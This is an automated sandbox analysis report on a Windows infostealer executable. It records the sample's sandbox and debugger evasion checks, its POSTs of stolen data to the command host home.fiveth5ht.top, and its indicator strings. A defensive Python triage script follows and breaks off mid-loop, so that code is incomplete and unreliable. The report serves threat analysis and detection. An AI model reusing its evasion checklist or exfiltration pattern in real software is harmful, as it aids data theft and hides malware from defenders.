
Windows Analysis Report
5KwhHEdmM4.exe

Overview

General Information

Sample name: 5KwhHEdmM4.exe (renamed because original name is a hash value)
Original sample name: 0c9fc2b51c7c604fd0bd9789f344cb95.exe
Analysis ID: 1581405
MD5: 0c9fc2b51c7c604fd0bd9789f344cb95
SHA1: c9dcd9ec34f73e7d109605f5b092e7f16be55bd7
SHA256: 5215a50e992b411a73a9cb9dee51b39ce8b7505de7995bcba240e6f809b3696b
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 5KwhHEdmM4.exe (PID: 6528 cmdline: "C:\Users\user\Desktop\5KwhHEdmM4.exe" MD5: 0C9FC2B51C7C604FD0BD9789F344CB95)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: 5KwhHEdmM4.exe | Avira: detected
Source: 5KwhHEdmM4.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 5KwhHEdmM4.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: -----BEGIN PUBLIC KEY----- 0_2_00DBDCF0
Source: 5KwhHEdmM4.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh 0_2_00DFA5B0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_00DFA7F0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: mov dword ptr [edi+04h], 424D53FFh 0_2_00DFA7F0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: mov dword ptr [esi+04h], 424D53FFh 0_2_00DFA7F0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_00DFB560
Source: 5KwhHEdmM4.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00D9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00D929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1
    Host: httpbin.org
    Accept: */*
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
    Host: home.fiveth5ht.top
    Accept: */*
    Content-Type: application/json
    Content-Length: 443147
Source: global traffic | HTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
    Host: home.fiveth5ht.top
    Accept: */*
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
    Host: home.fiveth5ht.top
    Accept: */*
    Content-Type: application/json
    Content-Length: 31
    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
    Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 34.226.108.155
Source: Joe Sandbox View | IP Address: 5.101.3.217
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (8 occurrences)
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00E5A8C0 recvfrom
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1
    Host: httpbin.org
    Accept: */*
Source: global traffic | HTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
    Host: home.fiveth5ht.top
    Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknown | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
    Host: home.fiveth5ht.top
    Accept: */*
    Content-Type: application/json
    Content-Length: 443147
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND
    Server: nginx/1.22.1
    Date: Fri, 27 Dec 2024 14:06:01 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 207
    Connection: close
    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND
    Server: nginx/1.22.1
    Date: Fri, 27 Dec 2024 14:06:03 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 207
    Connection: close
    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.css
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.jpg
Source: 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: 5KwhHEdmM4.exe, 00000000.00000002.1414833228.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: 5KwhHEdmM4.exe, 00000000.00000003.1397048941.0000000001BF7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1
Source: 5KwhHEdmM4.exe, 00000000.00000002.1414923055.0000000001C05000.00000004.00000020.00020000.00000000.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1396477797.0000000001C03000.00000004.00000020.00020000.00000000.sdmp, 5KwhHEdmM4.exe, 00000000.00000002.1414762865.0000000001BCE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: 5KwhHEdmM4.exe, 00000000.00000002.1414762865.0000000001BCE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=000
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 5KwhHEdmM4.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: 5KwhHEdmM4.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: 5KwhHEdmM4.exe, 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 5KwhHEdmM4.exe | String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443

System Summary

Source: 5KwhHEdmM4.exe | Static PE information: section name:
Source: 5KwhHEdmM4.exe | Static PE information: section name: .idata
Source: 5KwhHEdmM4.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_3_01C63360 (3 occurrences)
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00DA05B0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00DA6FA0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00E5B180
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00DCF100
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00E600E0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_0111A000
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_0111E050
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00DF6210
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00E5C320
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00E60420
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_010E4410
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_010F6730
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_01114780
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00D9E620
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00DFA7F0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00E5C770
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00DA4940
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00D9A960
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00E4C900
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_0104AB2C
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00F66AC0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_01108BF0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00D9CBB0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00F24B60
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_0104AAC0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_01114D40
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_0110CD80
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_0111CC90
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_010E2F90
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_010AAE30
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00E5EF90
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00E58F90
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00DB4F70
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00DA10E6
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_011035B0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_010FD430
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_011217A0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_010E56D0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_010E9920
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00E49880
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_01101BD0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00DD1BE0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_01113A70
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00DA5DB0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_01049C80
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_010F7CC0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00DA3ED0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00DB5EB0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: String function: 00D9C960 appears 37 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: String function: 00DD50A0 appears 101 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: String function: 00DD4F40 appears 347 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: String function: 00D9CAA0 appears 64 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: String function: 00DD5340 appears 50 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: String function: 00E744A0 appears 76 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: String function: 00D971E0 appears 47 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: String function: 00F6CBC0 appears 104 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: String function: 00DD4FD0 appears 291 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: String function: 00DACD40 appears 75 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: String function: 00D975A0 appears 706 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: String function: 00F47220 appears 97 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: String function: 00D973F0 appears 114 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: String function: 00DACCD0 appears 55 times
Source: 5KwhHEdmM4.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 5KwhHEdmM4.exe | Static PE information: Section: dmqztadf ZLIB complexity 0.994349809751973
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00D9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00D929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | File read: C:\Windows\System32\drivers\etc\hosts (4 occurrences)
Source: 5KwhHEdmM4.exe | ReversingLabs: Detection: 47%
Source: 5KwhHEdmM4.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: 5KwhHEdmM4.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Section loaded: kernel.appcore.dll
Source: 5KwhHEdmM4.exe | Static file information: File size 4488704 > 1048576
Source: 5KwhHEdmM4.exe | Static PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: 5KwhHEdmM4.exe | Static PE information: Raw size of dmqztadf is bigger than: 0x100000 < 0x1bb800

Data Obfuscation

Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Unpacked PE file: 0.2.5KwhHEdmM4.exe.d90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dmqztadf:EW;eghuolxt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dmqztadf:EW;eghuolxt:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: 5KwhHEdmM4.exe | Static PE information: real checksum: 0x4533e4 should be: 0x4546e1
Source: 5KwhHEdmM4.exe | Static PE information: section name:
Source: 5KwhHEdmM4.exe | Static PE information: section name: .idata
Source: 5KwhHEdmM4.exe | Static PE information: section name:
Source: 5KwhHEdmM4.exe | Static PE information: section name: dmqztadf
Source: 5KwhHEdmM4.exe | Static PE information: section name: eghuolxt
Source: 5KwhHEdmM4.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_3_01C64AD8 push eax; ret 0_3_01C64AD9 (3 occurrences)
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_3_01C5E44B pushad ; ret 0_3_01C5E45D (3 occurrences)
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_011141D0 push eax; mov dword ptr [esp], edx 0_2_011141D5
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00E12340 push eax; mov dword ptr [esp], 00000000h 0_2_00E12343
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00E4C7F0 push eax; mov dword ptr [esp], 00000000h 0_2_00E4C743
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00DD0AC0 push eax; mov dword ptr [esp], 00000000h 0_2_00DD0AC4
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00DF1430 push eax; mov dword ptr [esp], 00000000h 0_2_00DF1433
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00E139A0 push eax; mov dword ptr [esp], 00000000h 0_2_00E139A3
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_00DEDAD0 push eax; mov dword ptr [esp], edx 0_2_00DEDAD1
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Code function: 0_2_01119F40 push dword ptr [eax+04h]; ret 0_2_01119F6F
Source: 5KwhHEdmM4.exe | Static PE information: section name: dmqztadf entropy: 7.955259097933418

Boot Survival

Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: X64DBG.EXE
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WINDBG.EXE
Source: 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
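Two of the findings above (the high-entropy section "dmqztadf" from the static PE information, and the window-class, tool-process and VirtualBox/Wine strings quoted here) can be reproduced offline before a sample is ever detonated. The script below is an added example, not Joe Sandbox code and not the sample's own code: it walks the PE section table, scores each section's Shannon entropy and name, and matches printable strings against the indicators the report quotes. The file it analyses is built by build_sample_pe() as a constructed stand-in for 5KwhHEdmM4.exe; the function names, the STANDARD_SECTIONS list and the 7.0-bit entropy cut-off are my own choices.

```python
"""Static triage for packed sections and embedded anti-analysis strings (added example)."""
import math
import re
import struct
from collections import Counter

# Names the usual toolchains emit; anything else deserves a look (assumed list).
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".pdata",
                     ".rsrc", ".reloc", ".bss", ".tls", ".CRT", ".textbss"}

# Indicator substrings quoted in the report, grouped by what the sample detects with them.
INDICATORS = {
    "process_monitor_window": ["FilemonClass", "PROCMON_WINDOW_CLASS", "RegmonClass"],
    "analysis_tool_process": ["procmon.exe", "x64dbg.exe", "windbg.exe", "wireshark.exe", "ida.exe"],
    "vm_or_sandbox_artifact": ["Software\\Wine", "HARDWARE\\ACPI\\DSDT\\VBOX__",
                               "SYSTEM32\\VBOX", "SERVICES\\VBOXSF", "C:\\USERS\\PUBLIC\\"],
}


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 8.0 means every byte value is equally frequent (packed or encrypted)."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def parse_sections(data: bytes):
    """Yield (name, raw_bytes) for each entry of the PE section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec = struct.unpack_from("<H", data, pe_off + 6)[0]        # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]   # COFF SizeOfOptionalHeader
    table = pe_off + 24 + opt_size                              # section table follows the optional header
    for i in range(nsec):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        yield name.rstrip(b"\0").decode("latin-1"), data[raw_ptr:raw_ptr + raw_size]


def triage(data: bytes) -> dict:
    """Flag sections by entropy and name, then match printable strings against INDICATORS."""
    sections = []
    for name, raw in parse_sections(data):
        ent = shannon_entropy(raw)
        flags = []
        if ent >= 7.0:
            flags.append("high_entropy")
        if name not in STANDARD_SECTIONS:
            flags.append("nonstandard_name")
        if not re.fullmatch(r"[A-Za-z0-9._$]+", name):
            flags.append("special_chars")
        sections.append({"name": name, "entropy": ent, "flags": flags})
    strings = [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{5,}", data)]
    hits = {}
    for category, needles in INDICATORS.items():
        found = sorted({s for s in strings for n in needles if n.lower() in s.lower()})
        if found:
            hits[category] = found
    score = sum(len(s["flags"]) for s in sections) + sum(len(v) for v in hits.values())
    return {"sections": sections, "indicators": hits, "score": score}


def build_sample_pe() -> bytes:
    """Constructed 32-bit PE standing in for the sample: a tiny .text, a section named like
    the report's 'dmqztadf' filled with uniformly distributed bytes, and an .rdata carrying
    the indicator strings. Headers and raw data only; it is not meant to execute."""
    rdata = b"\0".join([b"PROCMON_WINDOW_CLASS", b"FilemonClass", b"RegmonClass",
                        b"Software\\Wine", b"HARDWARE\\ACPI\\DSDT\\VBOX__",
                        b"x64dbg.exe", b"wireshark.exe"]) + b"\0"
    payloads = [(b".text", b"\x55\x8b\xec" + b"\x90" * 509),
                (b"dmqztadf", bytes(range(256)) * 4),
                (b".rdata", rdata)]
    align = 0x200
    first_raw = -(-(0x40 + 24 + 224 + 40 * len(payloads)) // align) * align
    table, body = b"", b""
    for i, (name, raw) in enumerate(payloads):
        raw = raw.ljust(-(-len(raw) // align) * align, b"\0")
        table += struct.pack("<8sIIIIIIHHI", name, len(raw), 0x1000 * (i + 1),
                             len(raw), first_raw + len(body), 0, 0, 0, 0, 0x60000020)
        body += raw
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                       # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(payloads), 0, 0, 0, 224, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * 222                             # PE32 magic, rest zeroed
    return (dos + coff + opt + table).ljust(first_raw, b"\0") + body


if __name__ == "__main__":
    result = triage(build_sample_pe())
    for s in result["sections"]:
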